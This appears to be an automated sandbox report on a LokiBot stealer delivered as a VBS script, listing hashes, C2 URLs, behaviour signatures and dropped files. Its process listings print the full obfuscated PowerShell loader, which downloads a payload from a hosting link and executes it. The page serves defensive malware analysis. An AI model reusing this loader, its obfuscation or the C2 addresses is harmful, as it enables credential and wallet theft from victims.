Overview

overview

10

Static

static

1

2c2a57b3a1...15.vbs

windows7-x64

10

2c2a57b3a1...15.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    02-10-2024 05:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815.vbs

  • Size

    77KB

  • MD5

    34273527e12e172917598d0e29994432

  • SHA1

    d390fd4b4ffc45be0a7cf05765af19e402377640

  • SHA256

    2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815

  • SHA512

    b9693348f7ddc2564c7a1ce748e58b080c73e57a85ae8f3b673d60106be4c967708c035ca2a820b7470a2be7642592c2db6c14ec9cccd0849eb153f8caebb6f9

  • SSDEEP

    1536:sI0FsAXA4vqGxAx9bBuQPOyk+4OU8vL0yUbVBwXYf:sIcpPAPbB4OFQyIf

Score
10/10
lokibotcollectiondiscoveryspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://137.184.191.215/index.php/10899

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 11 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2400
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi ');$Broderierne=$Unstudiedness[0];$Skomager=(atomangreb ',idde$Ka hagHresvl StamO Kal b S.ocAUnrislTvist:SlagtBRe rojAfhj R S,ilN .uckeProgn=konstn rfrieSphenw cle,- AnemOKartoBHaartJVacuueTrnincDoktoTstige UgunsSDigitYNonexSFlu,stFejlkeSvmmem Trol.DhanuNEfferEProcotUmrke.BugseWBi.leeKalasb.railCRustnlpressILaa.eEtil uNverfeT I dg ');rme ($Skomager);rme (atomangreb 'Prize$ phorBDebaujHuahurOpst nTyfo eFrimr.WaddlHMalkieMis aa nhiddVaasbe,imilr CadisE.for[Forbe$YlettlFaunii Teleb Absur,esideSc.lpt.rbort Debao Ke,beAlh.nnVandlsLogic]Pregg=Reviv$ SociG Mi.tuSclerlNiobivPersomFatteaSk igaGaul tincu t Aa.seSpongnBugvgs P.ra ');$Perdition=atomangreb ' ispl$.rdseBContrjTetrarQuin,n So.keDrage.Trap DHo umoIstn.wR.ingn Panelfragao eiteaSlotedComplFb dehiDrtril G noeKabin(Ma ie$urfunBDisporSpillo Opk dKvruleFdepurPaxili U.gieForgrrSt,drnPuddledipte, Sexi$M nipPforudr.urrao BayepWoulde Mordlruffi) Bypl ';$Propel=$Overcoat;rme (atomangreb 'Ciste$Dra ogEtaetl Ref OTrkg.bPur eaSquabl Scap:KraveCReteaATilbar nfopUnprooAudivGCaseheFago nNur,uOHapchUInappsResid=Nedfa(C.ingtYokele,kulpsForthTlibe -Dyse P HungAFlygtt GiesHOverr baand$ D poPHem tRMilliO raadPAutosEAbstilRefe,) Ass ');while (!$Carpogenous) {rme (atomangreb 'Resum$ ensogKendel Udtao drmmbSgemeaStalkl Br.v: ordiMCha giHem ssKompltTilskiOxy.el Endel LkkeiLgekod pyreeRa.binerotosReall=undia$BilistKostprR allu In teStorf ') ;rme $Perdition;rme (atomangreb 'StreaSSporttsarada Muddr NucutSsyge-revolS irazlLydm eAfseneStachpBa ne olio4 Keou ');rme (atomangreb 'Vir e$Mesteg Co plNordfoNigribBl,ffa Seatl .yrt:fiskeC C,mpa A.terOrthop Eegso oneqgMis ielocomnUlt,aoPrejuu E shs Tppe= Vita(SphalTudrejeDucktsJinritFusti- EnfoPGidseaMed.ctGrupphCirc Navn $,nderPMaarhrV ntroUf rep R maePhosplVener) Gru, ') ;rme (atomangreb 'toywo$ klekgChurllSaboloLs,efbF,actaB jstlPapir: eterODri.kp Fal.tKlammr DazekCh,kenSerioiIndecn arkegLitte= pere$Transg EpislR dakoGr skbSmileaSkriflSyrak:MiswiDIndiai lansSquatp IsoceFo skr Epi,sPr noiO bluo.allon eriseOverer EndonSpej eFlock+S lvr+Gonoz%A omi$UranoUPege,nL llis VaastunaccuEno.mdPantoiLe,icesad ldffebenDispoeAlkohs Tweis .ita. ByrecBoglao MiniuUpswenSt ert heck ') ;$Broderierne=$Unstudiedness[$Optrkning];}$Diktatet=320570;$Syntaksgenkendelserne=31274;rme (atomangreb ' Laan$StartgCoronlMultio OverbUforua .razlAngli:BurnePSuperaBillerBenefaFdresdDischeGall favetguAn dilOutpu Re n=D ama FortjGGravee RundtCargo-mesioC NeuroHerben BandtFosseeKidnanSubcot emia Odor $MissePZenitrFinano Datap s ideVordil Ou s ');rme (atomangreb ' Pra $Gene gskrbelFo gio servbBommeaudma lAnlgg:Sa,elSNaadeyCoequdSavenfAk amoStrtarT rbah AblenY uthgIrvine upernTurcye uzzwsFo nj Udma =Edelh Succe[ GlasSNynazyMikros obbet KeyweParenm Foxd.SpandCRadiaoTransn vetsvTs.tseOlenirB,nkotExcav]Galac:Cani :EstabF ittirCalisoMicromCo toBCorklaDimwisUnp reJurym6Jalou4TsardSnedbrt FzfurPussyiSp ngnGudf.g Ridd(Unjag$ DeodPC lloaMatsar OrdraB,odid Vareep nfefExtrauGlog lZonei) snak ');rme (atomangreb 'Bees,$AgacegR.genlInteroSpaltb landa Vandlfritj: P osRMongreBrancg .omgiTilvioAfs.anSlibrpSphyglMudpuaLv konQuan aThyrorBluenbFir.eeAmetyjLungedByplae,urbarDanse didra=Scrim Ungra[NaboiSTo guyGuya sDramatAskebeTotalmLatin.Unr cT Ve beOverhx OvertBacch. BronE BiolnGoderc moutoFu,igd Missi,iphtn C,tagPreto]Emnea:Nonme:EarthA FlugS atiCPl nuITr,ncIRiefs.JudicGAa dleZygodt illiSEftertjesp,rKeyseiPolonn ispugOutpo(,onoc$ Sk.uSSte tyCheq d CongfLejefoJeme rEndebhF,cadnskewigCho.neTyfusn ameeBro,esVenal) Kyma ');rme (atomangreb 'B,ndo$Ma.neg LupulOvertoLock bFam,laVansilunri :TopfiSDerbunHomoeiSemirgManuav UdkoeAparujAktieeTowie= Bibl$PackeRSanyaeTraadgFeltniintero Led nUnexhpNelielSkykla godvnMeddea mprirPompobRakkeeNostajTheopd Uns eFlankrAfhre.skodds Cinqu etrob Pakhs BagttFremlrBrunliGdni,n OpacgBo se(Tan.k$SuffrD Actiigartnk ap rtMe.tia TambtGimpeeNiftitstavl,Pamfi$DirekS ,artyJ mban Lit tGodstaward k.ntelsHellig RegieBeskynSmedekUnsp,eHeternMen edO ceteK ptalFlgessTakeue RethrT.agin raggeTires) Baad ');rme $Snigveje;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2752
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi ');$Broderierne=$Unstudiedness[0];$Skomager=(atomangreb ',idde$Ka hagHresvl StamO Kal b S.ocAUnrislTvist:SlagtBRe rojAfhj R S,ilN .uckeProgn=konstn rfrieSphenw cle,- AnemOKartoBHaartJVacuueTrnincDoktoTstige UgunsSDigitYNonexSFlu,stFejlkeSvmmem Trol.DhanuNEfferEProcotUmrke.BugseWBi.leeKalasb.railCRustnlpressILaa.eEtil uNverfeT I dg ');rme ($Skomager);rme (atomangreb 'Prize$ phorBDebaujHuahurOpst nTyfo eFrimr.WaddlHMalkieMis aa nhiddVaasbe,imilr CadisE.for[Forbe$YlettlFaunii Teleb Absur,esideSc.lpt.rbort Debao Ke,beAlh.nnVandlsLogic]Pregg=Reviv$ SociG Mi.tuSclerlNiobivPersomFatteaSk igaGaul tincu t Aa.seSpongnBugvgs P.ra ');$Perdition=atomangreb ' ispl$.rdseBContrjTetrarQuin,n So.keDrage.Trap DHo umoIstn.wR.ingn Panelfragao eiteaSlotedComplFb dehiDrtril G noeKabin(Ma ie$urfunBDisporSpillo Opk dKvruleFdepurPaxili U.gieForgrrSt,drnPuddledipte, Sexi$M nipPforudr.urrao BayepWoulde Mordlruffi) Bypl ';$Propel=$Overcoat;rme (atomangreb 'Ciste$Dra ogEtaetl Ref OTrkg.bPur eaSquabl Scap:KraveCReteaATilbar nfopUnprooAudivGCaseheFago nNur,uOHapchUInappsResid=Nedfa(C.ingtYokele,kulpsForthTlibe -Dyse P HungAFlygtt GiesHOverr baand$ D poPHem tRMilliO raadPAutosEAbstilRefe,) Ass ');while (!$Carpogenous) {rme (atomangreb 'Resum$ ensogKendel Udtao drmmbSgemeaStalkl Br.v: ordiMCha giHem ssKompltTilskiOxy.el Endel LkkeiLgekod pyreeRa.binerotosReall=undia$BilistKostprR allu In teStorf ') ;rme $Perdition;rme (atomangreb 'StreaSSporttsarada Muddr NucutSsyge-revolS irazlLydm eAfseneStachpBa ne olio4 Keou ');rme (atomangreb 'Vir e$Mesteg Co plNordfoNigribBl,ffa Seatl .yrt:fiskeC C,mpa A.terOrthop Eegso oneqgMis ielocomnUlt,aoPrejuu E shs Tppe= Vita(SphalTudrejeDucktsJinritFusti- EnfoPGidseaMed.ctGrupphCirc Navn $,nderPMaarhrV ntroUf rep R maePhosplVener) Gru, ') ;rme (atomangreb 'toywo$ klekgChurllSaboloLs,efbF,actaB jstlPapir: eterODri.kp Fal.tKlammr DazekCh,kenSerioiIndecn arkegLitte= pere$Transg EpislR dakoGr skbSmileaSkriflSyrak:MiswiDIndiai lansSquatp IsoceFo skr Epi,sPr noiO bluo.allon eriseOverer EndonSpej eFlock+S lvr+Gonoz%A omi$UranoUPege,nL llis VaastunaccuEno.mdPantoiLe,icesad ldffebenDispoeAlkohs Tweis .ita. ByrecBoglao MiniuUpswenSt ert heck ') ;$Broderierne=$Unstudiedness[$Optrkning];}$Diktatet=320570;$Syntaksgenkendelserne=31274;rme (atomangreb ' Laan$StartgCoronlMultio OverbUforua .razlAngli:BurnePSuperaBillerBenefaFdresdDischeGall favetguAn dilOutpu Re n=D ama FortjGGravee RundtCargo-mesioC NeuroHerben BandtFosseeKidnanSubcot emia Odor $MissePZenitrFinano Datap s ideVordil Ou s ');rme (atomangreb ' Pra $Gene gskrbelFo gio servbBommeaudma lAnlgg:Sa,elSNaadeyCoequdSavenfAk amoStrtarT rbah AblenY uthgIrvine upernTurcye uzzwsFo nj Udma =Edelh Succe[ GlasSNynazyMikros obbet KeyweParenm Foxd.SpandCRadiaoTransn vetsvTs.tseOlenirB,nkotExcav]Galac:Cani :EstabF ittirCalisoMicromCo toBCorklaDimwisUnp reJurym6Jalou4TsardSnedbrt FzfurPussyiSp ngnGudf.g Ridd(Unjag$ DeodPC lloaMatsar OrdraB,odid Vareep nfefExtrauGlog lZonei) snak ');rme (atomangreb 'Bees,$AgacegR.genlInteroSpaltb landa Vandlfritj: P osRMongreBrancg .omgiTilvioAfs.anSlibrpSphyglMudpuaLv konQuan aThyrorBluenbFir.eeAmetyjLungedByplae,urbarDanse didra=Scrim Ungra[NaboiSTo guyGuya sDramatAskebeTotalmLatin.Unr cT Ve beOverhx OvertBacch. BronE BiolnGoderc moutoFu,igd Missi,iphtn C,tagPreto]Emnea:Nonme:EarthA FlugS atiCPl nuITr,ncIRiefs.JudicGAa dleZygodt illiSEftertjesp,rKeyseiPolonn ispugOutpo(,onoc$ Sk.uSSte tyCheq d CongfLejefoJeme rEndebhF,cadnskewigCho.neTyfusn ameeBro,esVenal) Kyma ');rme (atomangreb 'B,ndo$Ma.neg LupulOvertoLock bFam,laVansilunri :TopfiSDerbunHomoeiSemirgManuav UdkoeAparujAktieeTowie= Bibl$PackeRSanyaeTraadgFeltniintero Led nUnexhpNelielSkykla godvnMeddea mprirPompobRakkeeNostajTheopd Uns eFlankrAfhre.skodds Cinqu etrob Pakhs BagttFremlrBrunliGdni,n OpacgBo se(Tan.k$SuffrD Actiigartnk ap rtMe.tia TambtGimpeeNiftitstavl,Pamfi$DirekS ,artyJ mban Lit tGodstaward k.ntelsHellig RegieBeskynSmedekUnsp,eHeternMen edO ceteK ptalFlgessTakeue RethrT.agin raggeTires) Baad ');rme $Snigveje;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3060
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:2464

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128
    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128
    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4JEZJNTQJ8DO80NQP48V.temp
    Filesize

    7KB

    MD5

    c3520f2287b679670df786843cc4531a

    SHA1

    1f912f96672eef92d4ee97ce6a99f83a49963193

    SHA256

    9be46120a96f2c17551dd6665afe3179e7439d441d852ca13c0ec4895817647b

    SHA512

    afc0f8bedef6d61c2b0b14781e2c81830ce613baad4846466b34f85e181a6acba8ac496af72d3a1dec7f19d76ab30588e6839dc5eaf9551fe89c71560084af8e

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Smaalige.Eks
    Filesize

    458KB

    MD5

    743e8aa7e1d11f204b239e36bafc481e

    SHA1

    a42afad52fda74decb6deb3a12deacfc6f639873

    SHA256

    9ff25a7ebbcf8054d44fd7a23bd936d6a6b7d44e813301872dcb74bbcf918390

    SHA512

    66be179d313d849062b7c9c6a5bf20fd8993e34ec2995a4645fb83b3a95ffa676faa066705c48f08a27393117ee4ca0ef46eb4757a363fd5ed500bb24a365580

    Download Submit

  • memory/2464-41-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2752-13-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2752-10-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2752-12-0x000007FEF653E000-0x000007FEF653F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2752-4-0x000007FEF653E000-0x000007FEF653F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2752-15-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2752-9-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2752-8-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2752-7-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2752-6-0x00000000022D0000-0x00000000022D8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2752-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/3060-19-0x0000000006540000-0x0000000009A6D000-memory.dmp

    Filesize

    53.2MB

    Download